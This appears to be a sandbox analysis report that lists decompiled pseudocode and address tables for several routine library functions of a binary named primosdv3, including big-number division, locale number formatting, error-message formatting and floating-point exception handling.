									}
									_v76 = 0;
									_t307 = _t306 + 0xffffffff;
									__eflags = _t307;
									_v32 = _t307;
									if(_t307 < 0) {
										_t331 = 0;
										__eflags = 0;
									} else {
										_t85 =  &(_t262[1]); // 0x4
										_v20 =  &(_t85[_t307]);
										_t206 = _t307 + _t330;
										_t90 = _t262 - 4; // -4
										_v12 = _t206;
										_t278 = _t90 + _t206 * 4;
										_v80 = _t278;
										do {
											__eflags = _t206 - _v16;
											if(_t206 > _v16) {
												_t207 = 0;
												__eflags = 0;
											} else {
												_t207 = _t278[2];
											}
											__eflags = _v40;
											_t311 = _t278[1];
											_t279 =  *_t278;
											_v52 = _t207;
											_v44 = 0;
											_v8 = _t207;
											_v24 = _t279;
											if(_v40 > 0) {
												_t318 = _v8;
												_t336 = _t279 >> _v64;
												_t230 = E00C7F0C0(_t311, _v40, _t318);
												_t279 = _v40;
												_t207 = _t318;
												_t311 = _t336 | _t230;
												_t359 = _v24 << _t279;
												__eflags = _v12 - 3;
												_v8 = _t318;
												_v24 = _t359;
												if(_v12 >= 3) {
													_t279 = _v64;
													_t360 = _t359 |  *(_t262 + (_v60 + _v32) * 4 - 8) >> _t279;
													__eflags = _t360;
													_t207 = _v8;
													_v24 = _t360;
												}
											}
											_t208 = E00C921C0(_t311, _t207, _v56, 0);
											_v44 = _t262;
											_t263 = _t208;
											_v44 = 0;
											_t209 = _t311;
											_v8 = _t263;
											_v28 = _t209;
											_t333 = _t279;
											_v72 = _t263;
											_v68 = _t209;
											__eflags = _t209;
											if(_t209 != 0) {
												L40:
												_t264 = _t263 + 1;
												asm("adc eax, 0xffffffff");
												_t333 = _t333 + E00C7F0E0(_t264, _t209, _v56, 0);
												asm("adc esi, edx");
												_t263 = _t264 | 0xffffffff;
												_t209 = 0;
												__eflags = 0;
												_v44 = 0;
												_v8 = _t263;
												_v72 = _t263;
												_v28 = 0;
												_v68 = 0;
											} else {
												__eflags = _t263 - 0xffffffff;
												if(_t263 > 0xffffffff) {
													goto L40;
												}
											}
											__eflags = 0;
											if(0 <= 0) {
												if(0 < 0) {
													goto L44;
												} else {
													__eflags = _t333 - 0xffffffff;
													if(_t333 <= 0xffffffff) {
														while(1) {
															L44:
															_v8 = _v24;
															_t228 = E00C7F0E0(_v36, 0, _t263, _t209);
															__eflags = _t311 - _t333;
															if(__eflags < 0) {
																break;
															}
															if(__eflags > 0) {
																L47:
																_t209 = _v28;
																_t263 = _t263 + 0xffffffff;
																_v72 = _t263;
																asm("adc eax, 0xffffffff");
																_t333 = _t333 + _v56;
																__eflags = _t333;
																_v28 = _t209;
																asm("adc dword [ebp-0x28], 0x0");
																_v68 = _t209;
																if(_t333 == 0) {
																	__eflags = _t333 - 0xffffffff;
																	if(_t333 <= 0xffffffff) {
																		continue;
																	} else {
																	}
																}
															} else {
																__eflags = _t228 - _v8;
																if(_t228 <= _v8) {
																	break;
																} else {
																	goto L47;
																}
															}
															L51:
															_v8 = _t263;
															goto L52;
														}
														_t209 = _v28;
														goto L51;
													}
												}
											}
											L52:
											__eflags = _t209;
											if(_t209 != 0) {
												L54:
												_t280 = _v60;
												_t334 = 0;
												_t355 = 0;
												__eflags = _t280;
												if(_t280 != 0) {
													_t266 = _v20;
													_t219 =  &(_a8[1]);
													__eflags = _t219;
													_v24 = _t219;
													_v16 = _t280;
													do {
														_v44 =  *_t219;
														_t225 =  *_t266;
														_t286 = _t334 + _v72 * _v44;
														asm("adc esi, edx");
														_t334 = _t355;
														_t355 = 0;
														__eflags = _t225 - _t286;
														if(_t225 < _t286) {
															_t334 = _t334 + 1;
															asm("adc esi, esi");
														}
														 *_t266 = _t225 - _t286;
														_t266 = _t266 + 4;
														_t219 = _v24 + 4;
														_t164 =  &_v16;
														 *_t164 = _v16 - 1;
														__eflags =  *_t164;
														_v24 = _t219;
													} while ( *_t164 != 0);
													_t263 = _v8;
													_t280 = _v60;
												}
												__eflags = 0 - _t355;
												if(__eflags <= 0) {
													if(__eflags < 0) {
														L63:
														__eflags = _t280;
														if(_t280 != 0) {
															_t338 = _t280;
															_t314 = _v20;
															_t362 =  &(_a8[1]);
															__eflags = _t362;
															_t265 = 0;
															do {
																_t282 =  *_t314;
																_t172 = _t362 + 4; // 0xa6a5959
																_t362 = _t172;
																_t314 = _t314 + 4;
																asm("adc eax, eax");
																 *((intOrPtr*)(_t314 - 4)) = _t282 +  *((intOrPtr*)(_t362 - 4)) + _t265;
																asm("adc eax, 0x0");
																_t265 = 0;
																_t338 = _t338 - 1;
																__eflags = _t338;
															} while (_t338 != 0);
															_t263 = _v8;
														}
														_t263 = _t263 + 0xffffffff;
														asm("adc dword [ebp-0x18], 0xffffffff");
													} else {
														__eflags = _v52 - _t334;
														if(_v52 < _t334) {
															goto L63;
														}
													}
												}
												_t213 = _v12 - 1;
												__eflags = _t213;
												_v16 = _t213;
											} else {
												__eflags = _t263;
												if(_t263 != 0) {
													goto L54;
												}
											}
											_t331 = 0 + _t263;
											asm("adc esi, 0x0");
											_v20 = _v20 - 4;
											_t313 = _v32 - 1;
											_t262 = _a4;
											_t278 = _v80 - 4;
											_t206 = _v12 - 1;
											_v76 = _t331;
											_v32 = _t313;
											_v80 = _t278;
											_v12 = _t206;
											__eflags = _t313;
										} while (_t313 >= 0);
									}
									_t309 = _v16 + 1;
									_t204 = _t309;
									__eflags = _t204 -  *_t262;
									if(_t204 <  *_t262) {
										_t191 = _t204 + 1; // 0xc8ea5d
										_t274 =  &(_t262[_t191]);
										do {
											 *_t274 = 0;
											_t194 =  &(_t274[1]); // 0x91850fc2
											_t274 = _t194;
											_t204 = _t204 + 1;
											__eflags = _t204 -  *_t262;
										} while (_t204 <  *_t262);
									}
									 *_t262 = _t309;
									__eflags = _t309;
									if(_t309 != 0) {
										while(1) {
											_t271 =  *_t262;
											__eflags = _t262[_t271];
											if(_t262[_t271] != 0) {
												goto L78;
											}
											_t272 = _t271 + 0xffffffff;
											__eflags = _t272;
											 *_t262 = _t272;
											if(_t272 != 0) {
												continue;
											}
											goto L78;
										}
									}
									L78:
									return _t331;
								} else {
									goto L23;
								}
							}
						} else {
							_t6 =  &(_t328[1]); // 0xfc23b5a
							_t295 =  *_t6;
							_v44 = _t295;
							__eflags = _t295 - 1;
							if(_t295 != 1) {
								__eflags = _t349;
								if(_t349 != 0) {
									_t342 = 0;
									_v12 = 0;
									_v8 = 0;
									_v20 = 0;
									__eflags = _t349 - 0xffffffff;
									if(_t349 != 0xffffffff) {
										_t250 = _v16 + 1;
										__eflags = _t250;
										_v32 = _t250;
										_t373 =  &(_t262[_t349 + 1]);
										do {
											_t253 = E00C921C0( *_t373, _t342, _t295, 0);
											_v68 = _t303;
											_t373 = _t373 - 4;
											_v20 = _t262;
											_t342 = _t295;
											_t303 = 0 + _t253;
											asm("adc ecx, 0x0");
											_v12 = _t303;
											_t34 =  &_v32;
											 *_t34 = _v32 - 1;
											__eflags =  *_t34;
											_v8 = _v12;
											_t295 = _v44;
										} while ( *_t34 != 0);
										_t262 = _a4;
									}
									_v544 = 0;
									_t41 =  &(_t262[1]); // 0x4
									_t370 = _t41;
									 *_t262 = 0;
									E00C8BDE1(_t370, 0x1cc,  &_v540, 0);
									_t247 = _v20;
									__eflags = 0 - _t247;
									 *_t370 = _t342;
									_t262[2] = _t247;
									asm("sbb ecx, ecx");
									__eflags =  ~0x00000000;
									 *_t262 = 0xbadbae;
									return _v12;
								} else {
									_t14 =  &(_t262[1]); // 0x4
									_t344 = _t14;
									_v544 = 0;
									 *_t262 = 0;
									E00C8BDE1(_t344, 0x1cc,  &_v540, 0);
									_t256 = _t262[1];
									_t322 = _t256 % _v44;
									__eflags = 0 - _t322;
									 *_t344 = _t322;
									asm("sbb ecx, ecx");
									__eflags = 0;
									 *_t262 =  ~0x00000000;
									return _t256 / _v44;
								}
							} else {
								_t9 =  &(_t262[1]); // 0x4
								_v544 = _t198;
								 *_t262 = _t198;
								E00C8BDE1(_t9, 0x1cc,  &_v540, _t198);
								__eflags = 0;
								return _t262[1];
							}
						}
					} else {
						__eflags = 0;
						return 0;
					}
				} else {
					return _t197;
				}
			}

0x00c8d44c
0x00c8d44f
0x00c8d453
0x00c8d45d
0x00c8d460
0x00c8d462
0x00c8d464
0x00c8d471
0x00c8d471
0x00c8d474
0x00c8d474
0x00c8d477
0x00c8d47a
0x00c8d47c
0x00c8d5af
0x00c8d5b1
0x00c8d5fa
0x00c8d5fe
0x00c8d604
0x00c8d5b3
0x00c8d5b5
0x00c8d5b8
0x00c8d5ba
0x00c8d5bd
0x00c8d5bf
0x00c8d5c1
0x00c8d5f5
0x00c8d5f5
0x00c8d5f5
0x00c8d5c3
0x00c8d5c8
0x00c8d5ce
0x00c8d5ce
0x00c8d5d1
0x00c8d5d3
0x00c8d5d5
0x00000000
0x00000000
0x00c8d5d7
0x00c8d5d8
0x00c8d5db
0x00c8d5de
0x00c8d5e0
0x00000000
0x00c8d5e2
0x00000000
0x00c8d5e2
0x00000000
0x00c8d5e0
0x00c8d5e4
0x00c8d5eb
0x00c8d5ef
0x00c8d5f3
0x00000000
0x00000000
0x00c8d5f3
0x00c8d5f6
0x00c8d5f6
0x00c8d5f8
0x00c8d605
0x00c8d608
0x00c8d60b
0x00c8d60e
0x00c8d60e
0x00c8d612
0x00c8d615
0x00c8d618
0x00c8d61b
0x00c8d626
0x00c8d61d
0x00c8d622
0x00c8d622
0x00c8d630
0x00c8d635
0x00c8d638
0x00c8d63a
0x00c8d644
0x00c8d647
0x00c8d64e
0x00c8d651
0x00c8d654
0x00c8d65c
0x00c8d662
0x00c8d662
0x00c8d662
0x00c8d662
0x00c8d654
0x00c8d667
0x00c8d66e
0x00c8d66e
0x00c8d671
0x00c8d674
0x00c8d8a6
0x00c8d8a6
0x00c8d67a
0x00c8d67a
0x00c8d680
0x00c8d683
0x00c8d686
0x00c8d689
0x00c8d68c
0x00c8d68f
0x00c8d692
0x00c8d692
0x00c8d695
0x00c8d69c
0x00c8d69c
0x00c8d697
0x00c8d697
0x00c8d697
0x00c8d69e
0x00c8d6a2
0x00c8d6a5
0x00c8d6a7
0x00c8d6aa
0x00c8d6b1
0x00c8d6b4
0x00c8d6b7
0x00c8d6c2
0x00c8d6c5
0x00c8d6ca
0x00c8d6cf
0x00c8d6d6
0x00c8d6db
0x00c8d6dd
0x00c8d6df
0x00c8d6e3
0x00c8d6e6
0x00c8d6e9
0x00c8d6f1
0x00c8d6fa
0x00c8d6fa
0x00c8d6fc
0x00c8d6ff
0x00c8d6ff
0x00c8d6e9
0x00c8d709
0x00c8d70e
0x00c8d713
0x00c8d715
0x00c8d718
0x00c8d71a
0x00c8d71d
0x00c8d720
0x00c8d722
0x00c8d725
0x00c8d728
0x00c8d72a
0x00c8d731
0x00c8d736
0x00c8d739
0x00c8d743
0x00c8d745
0x00c8d747
0x00c8d74a
0x00c8d74a
0x00c8d74c
0x00c8d74f
0x00c8d752
0x00c8d755
0x00c8d758
0x00c8d72c
0x00c8d72c
0x00c8d72f
0x00000000
0x00000000
0x00c8d72f
0x00c8d75b
0x00c8d75d
0x00c8d75f
0x00000000
0x00c8d761
0x00c8d761
0x00c8d764
0x00c8d766
0x00c8d766
0x00c8d774
0x00c8d777
0x00c8d77c
0x00c8d77e
0x00000000
0x00000000
0x00c8d780
0x00c8d787
0x00c8d787
0x00c8d78a
0x00c8d78d
0x00c8d790
0x00c8d793
0x00c8d793
0x00c8d796
0x00c8d799
0x00c8d79d
0x00c8d7a0
0x00c8d7a2
0x00c8d7a5
0x00000000
0x00000000
0x00c8d7a7
0x00c8d7a5
0x00c8d782
0x00c8d782
0x00c8d785
0x00000000
0x00000000
0x00000000
0x00000000
0x00c8d785
0x00c8d7ac
0x00c8d7ac
0x00000000
0x00c8d7ac
0x00c8d7a9
0x00000000
0x00c8d7a9
0x00c8d764
0x00c8d75f
0x00c8d7af
0x00c8d7af
0x00c8d7b1
0x00c8d7bb
0x00c8d7bb
0x00c8d7be
0x00c8d7c0
0x00c8d7c2
0x00c8d7c4
0x00c8d7c9
0x00c8d7cc
0x00c8d7cc
0x00c8d7cf
0x00c8d7d2
0x00c8d7d5
0x00c8d7d7
0x00c8d7ec
0x00c8d7ee
0x00c8d7f0
0x00c8d7f2
0x00c8d7f4
0x00c8d7f6
0x00c8d7f8
0x00c8d7fa
0x00c8d7fd
0x00c8d7fd
0x00c8d801
0x00c8d803
0x00c8d809
0x00c8d80c
0x00c8d80c
0x00c8d80c
0x00c8d810
0x00c8d810
0x00c8d815
0x00c8d818
0x00c8d818
0x00c8d81d
0x00c8d81f
0x00c8d821
0x00c8d828
0x00c8d828
0x00c8d82a
0x00c8d82f
0x00c8d831
0x00c8d834
0x00c8d834
0x00c8d837
0x00c8d840
0x00c8d840
0x00c8d842
0x00c8d842
0x00c8d847
0x00c8d84d
0x00c8d851
0x00c8d854
0x00c8d857
0x00c8d859
0x00c8d859
0x00c8d859
0x00c8d85e
0x00c8d85e
0x00c8d861
0x00c8d864
0x00c8d823
0x00c8d823
0x00c8d826
0x00000000
0x00000000
0x00c8d826
0x00c8d821
0x00c8d86b
0x00c8d86b
0x00c8d86c
0x00c8d7b3
0x00c8d7b3
0x00c8d7b5
0x00000000
0x00000000
0x00c8d7b5
0x00c8d87c
0x00c8d881
0x00c8d884
0x00c8d888
0x00c8d889
0x00c8d88c
0x00c8d88f
0x00c8d890
0x00c8d893
0x00c8d896
0x00c8d899
0x00c8d89c
0x00c8d89c
0x00c8d8a4
0x00c8d8ab
0x00c8d8ac
0x00c8d8ae
0x00c8d8b0
0x00c8d8b2
0x00c8d8b5
0x00c8d8c0
0x00c8d8c0
0x00c8d8c6
0x00c8d8c6
0x00c8d8c9
0x00c8d8ca
0x00c8d8ca
0x00c8d8c0
0x00c8d8ce
0x00c8d8d0
0x00c8d8d2
0x00c8d8d4
0x00c8d8d4
0x00c8d8d6
0x00c8d8da
0x00000000
0x00000000
0x00c8d8dc
0x00c8d8dc
0x00c8d8df
0x00c8d8e1
0x00000000
0x00000000
0x00000000
0x00c8d8e1
0x00c8d8d4
0x00c8d8e3
0x00c8d8ed
0x00000000
0x00000000
0x00000000
0x00c8d5f8
0x00c8d482
0x00c8d482
0x00c8d482
0x00c8d485
0x00c8d488
0x00c8d48b
0x00c8d4bc
0x00c8d4be
0x00c8d509
0x00c8d50b
0x00c8d512
0x00c8d519
0x00c8d51c
0x00c8d51f
0x00c8d525
0x00c8d525
0x00c8d526
0x00c8d529
0x00c8d530
0x00c8d539
0x00c8d53e
0x00c8d541
0x00c8d546
0x00c8d549
0x00c8d54b
0x00c8d550
0x00c8d553
0x00c8d556
0x00c8d556
0x00c8d556
0x00c8d55a
0x00c8d55d
0x00c8d55d
0x00c8d562
0x00c8d562
0x00c8d56d
0x00c8d578
0x00c8d578
0x00c8d57b
0x00c8d587
0x00c8d58c
0x00c8d597
0x00c8d599
0x00c8d59b
0x00c8d5a1
0x00c8d5a6
0x00c8d5a8
0x00c8d5ae
0x00c8d4c0
0x00c8d4cc
0x00c8d4cc
0x00c8d4cf
0x00c8d4df
0x00c8d4e5
0x00c8d4ec
0x00c8d4ee
0x00c8d4f6
0x00c8d4f8
0x00c8d4fa
0x00c8d4ff
0x00c8d502
0x00c8d508
0x00c8d508
0x00c8d48d
0x00c8d490
0x00c8d494
0x00c8d49a
0x00c8d4a9
0x00c8d4b3
0x00c8d4bb
0x00c8d4bb
0x00c8d48b
0x00c8d466
0x00c8d469
0x00c8d46f
0x00c8d46f
0x00c8d455
0x00c8d45b
0x00c8d45b

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
Instruction ID: aae2e7ce26a89b55e97c2fc59354f9e5e1d0d72221e81b43bcda291c0eefe3d9
Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
Instruction Fuzzy Hash: 8C021D71E002199FDF14DFA9D8806ADB7F1EF48318F15816AE91AE7384D731AE41CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00C7AF0F Relevance: 3.0, APIs: 2, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C7AF0F(signed int _a4, signed int _a8, short* _a12, int _a16) {
				short _v104;
				short _v304;
				short* _t23;
				int _t24;

				if( *0xc9e73c == 0) {
					GetLocaleInfoW(0x400, 0xf,  &_v304, 0x64);
					 *0xcbfcb0 = _v304;
					 *0xcbfcb2 = 0;
					 *0xc9e73c = 0xcbfcb0;
				}
				E00C704BD(_a4, _a8,  &_v104, 0x32);
				_t23 = _a12;
				_t24 = _a16;
				 *_t23 = 0;
				GetNumberFormatW(0x400, 0,  &_v104, 0xc9e72c, _t23, _t24);
				 *((short*)(_t23 + _t24 * 2 - 2)) = 0;
				return 0;
			}

0x00c7af27
0x00c7af35
0x00c7af42
0x00c7af4a
0x00c7af50
0x00c7af50
0x00c7af66
0x00c7af6b
0x00c7af70
0x00c7af7a
0x00c7af84
0x00c7af8c
0x00c7af95

APIs

GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00C7AF35
GetNumberFormatW.KERNEL32 ref: 00C7AF84

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: FormatInfoLocaleNumber
String ID:
API String ID: 2169056816-0
Opcode ID: cdf997dc34795edf690ca823a7aa14adfe508224273894c3843a20696d86ae30
Instruction ID: e4c76a4f5647b3f0555573636fe7a96975df89a94068fa562e0df70ad740c618
Opcode Fuzzy Hash: cdf997dc34795edf690ca823a7aa14adfe508224273894c3843a20696d86ae30
Instruction Fuzzy Hash: AD01217A200348AADB10DFA4EC49F9E77BCEF59710F009426FA0597261D3709955CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00C66C74 Relevance: 3.0, APIs: 2, Instructions: 16
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C66C74(WCHAR* _a4, long _a8) {
				long _t5;

				_t5 = GetLastError();
				if(_t5 == 0) {
					return 0;
				}
				return FormatMessageW(0x1200, 0, _t5, 0x400, _a4, _a8, 0) & 0xffffff00 | _t7 != 0x00000000;
			}

0x00c66c74
0x00c66c7c
0x00000000
0x00c66ca2
0x00000000

APIs

GetLastError.KERNEL32(00C66DDF,00000000,00000400), ref: 00C66C74
FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00C66C95

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 6e47babde71aec46bd96c6aedb2461d8172d7c4429efa7962fb2d208d063312b
Instruction ID: b2ad58586fb15e3290469de67704853acb2dd7abc8400f4f46e6e829af1348d0
Opcode Fuzzy Hash: 6e47babde71aec46bd96c6aedb2461d8172d7c4429efa7962fb2d208d063312b
Instruction Fuzzy Hash: ADD0C931344300FFFA210B628D4AF2E7B99BF45B91F18D405B795E80E0CB789924E629

Uniqueness

Uniqueness Score: -1.00%

Function 00C919F4 Relevance: 1.8, APIs: 1, Instructions: 269
COMMONLIBRARYCODECrypto

Download Yara Rule

C-Code - Quality: 100%

			E00C919F4(long _a4, signed int* _a8, signed char _a12, signed int _a16, intOrPtr* _a20, unsigned int* _a24, intOrPtr _a28) {
				signed int _t172;
				signed int _t175;
				signed int _t178;
				signed int* _t179;
				signed int _t195;
				signed int _t199;
				signed int _t202;
				void* _t203;
				void* _t206;
				signed int _t209;
				void* _t210;
				signed int _t225;
				unsigned int* _t240;
				signed char _t242;
				signed int* _t250;
				unsigned int* _t256;
				signed int* _t257;
				signed char _t259;
				long _t262;
				signed int* _t265;

				 *(_a4 + 4) = 0;
				_t262 = 0xc000000d;
				 *(_a4 + 8) = 0;
				 *(_a4 + 0xc) = 0;
				_t242 = _a12;
				if((_t242 & 0x00000010) != 0) {
					_t262 = 0xc000008f;
					 *(_a4 + 4) =  *(_a4 + 4) | 1;
				}
				if((_t242 & 0x00000002) != 0) {
					_t262 = 0xc0000093;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000002;
				}
				if((_t242 & 0x00000001) != 0) {
					_t262 = 0xc0000091;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000004;
				}
				if((_t242 & 0x00000004) != 0) {
					_t262 = 0xc000008e;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
				}
				if((_t242 & 0x00000008) != 0) {
					_t262 = 0xc0000090;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
				}
				_t265 = _a8;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 << 4) ^  *(_a4 + 8)) & 0x00000010;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 +  *_t265) ^  *(_a4 + 8)) & 0x00000008;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 1) ^  *(_a4 + 8)) & 0x00000004;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 3) ^  *(_a4 + 8)) & 0x00000002;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 5) ^  *(_a4 + 8)) & 1;
				_t259 = E00C8F352(_a4);
				if((_t259 & 0x00000001) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000010;
				}
				if((_t259 & 0x00000004) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000008;
				}
				if((_t259 & 0x00000008) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000004;
				}
				if((_t259 & 0x00000010) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000002;
				}
				if((_t259 & 0x00000020) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 1;
				}
				_t172 =  *_t265 & 0x00000c00;
				if(_t172 == 0) {
					 *_a4 =  *_a4 & 0xfffffffc;
				} else {
					if(_t172 == 0x400) {
						_t257 = _a4;
						_t225 =  *_t257 & 0xfffffffd | 1;
						L26:
						 *_t257 = _t225;
						L29:
						_t175 =  *_t265 & 0x00000300;
						if(_t175 == 0) {
							_t250 = _a4;
							_t178 =  *_t250 & 0xffffffeb | 0x00000008;
							L35:
							 *_t250 = _t178;
							L36:
							_t179 = _a4;
							_t254 = (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *_t179 =  *_t179 ^ (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *(_a4 + 0x20) =  *(_a4 + 0x20) | 1;
							if(_a28 == 0) {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe3 | 0x00000002;
								 *((long long*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t254 = _a4;
								_t240 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe3 | 0x00000002;
								 *(_a4 + 0x50) =  *_t240;
							} else {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe1;
								 *((intOrPtr*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t240 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe1;
								 *(_a4 + 0x50) =  *_t240;
							}
							E00C8F2B8(_t254);
							RaiseException(_t262, 0, 1,  &_a4);
							_t256 = _a4;
							if((_t256[2] & 0x00000010) != 0) {
								 *_t265 =  *_t265 & 0xfffffffe;
							}
							if((_t256[2] & 0x00000008) != 0) {
								 *_t265 =  *_t265 & 0xfffffffb;
							}
							if((_t256[2] & 0x00000004) != 0) {
								 *_t265 =  *_t265 & 0xfffffff7;
							}
							if((_t256[2] & 0x00000002) != 0) {
								 *_t265 =  *_t265 & 0xffffffef;
							}
							if((_t256[2] & 0x00000001) != 0) {
								 *_t265 =  *_t265 & 0xffffffdf;
							}
							_t195 =  *_t256 & 0x00000003;
							if(_t195 == 0) {
								 *_t265 =  *_t265 & 0xfffff3ff;
							} else {
								_t206 = _t195 - 1;
								if(_t206 == 0) {
									_t209 =  *_t265 & 0xfffff7ff | 0x00000400;
									L55:
									 *_t265 = _t209;
									L58:
									_t199 =  *_t256 >> 0x00000002 & 0x00000007;
									if(_t199 == 0) {
										_t202 =  *_t265 & 0xfffff3ff | 0x00000300;
										L64:
										 *_t265 = _t202;
										L65:
										if(_a28 == 0) {
											 *_t240 = _t256[0x14];
										} else {
											 *_t240 = _t256[0x14];
										}
										return _t202;
									}
									_t203 = _t199 - 1;
									if(_t203 == 0) {
										_t202 =  *_t265 & 0xfffff3ff | 0x00000200;
										goto L64;
									}
									_t202 = _t203 - 1;
									if(_t202 == 0) {
										 *_t265 =  *_t265 & 0xfffff3ff;
									}
									goto L65;
								}
								_t210 = _t206 - 1;
								if(_t210 == 0) {
									_t209 =  *_t265 & 0xfffffbff | 0x00000800;
									goto L55;
								}
								if(_t210 == 1) {
									 *_t265 =  *_t265 | 0x00000c00;
								}
							}
							goto L58;
						}
						if(_t175 == 0x200) {
							_t250 = _a4;
							_t178 =  *_t250 & 0xffffffe7 | 0x00000004;
							goto L35;
						}
						if(_t175 == 0x300) {
							 *_a4 =  *_a4 & 0xffffffe3;
						}
						goto L36;
					}
					if(_t172 == 0x800) {
						_t257 = _a4;
						_t225 =  *_t257 & 0xfffffffe | 0x00000002;
						goto L26;
					}
					if(_t172 == 0xc00) {
						 *_a4 =  *_a4 | 0x00000003;
					}
				}
			}

0x00c91a02
0x00c91a09
0x00c91a0e
0x00c91a14
0x00c91a17
0x00c91a1d
0x00c91a22
0x00c91a27
0x00c91a27
0x00c91a2d
0x00c91a32
0x00c91a37
0x00c91a37
0x00c91a3e
0x00c91a43
0x00c91a48
0x00c91a48
0x00c91a4f
0x00c91a54
0x00c91a59
0x00c91a59
0x00c91a60
0x00c91a65
0x00c91a6a
0x00c91a6a
0x00c91a72
0x00c91a82
0x00c91a94
0x00c91aa6
0x00c91ab9
0x00c91acb
0x00c91ad3
0x00c91ad8
0x00c91add
0x00c91add
0x00c91ae4
0x00c91ae9
0x00c91ae9
0x00c91af0
0x00c91af5
0x00c91af5
0x00c91afc
0x00c91b01
0x00c91b01
0x00c91b08
0x00c91b0d
0x00c91b0d
0x00c91b17
0x00c91b19
0x00c91b53
0x00c91b1b
0x00c91b20
0x00c91b44
0x00c91b4c
0x00c91b40
0x00c91b40
0x00c91b56
0x00c91b5d
0x00c91b5f
0x00c91b81
0x00c91b89
0x00c91b8c
0x00c91b8c
0x00c91b8e
0x00c91b8e
0x00c91b99
0x00c91b9f
0x00c91ba4
0x00c91bab
0x00c91be5
0x00c91bf0
0x00c91bf6
0x00c91bf9
0x00c91bfc
0x00c91c08
0x00c91c10
0x00c91bad
0x00c91bb0
0x00c91bbc
0x00c91bc2
0x00c91bc8
0x00c91bcb
0x00c91bd4
0x00c91bd4
0x00c91c13
0x00c91c21
0x00c91c27
0x00c91c2e
0x00c91c30
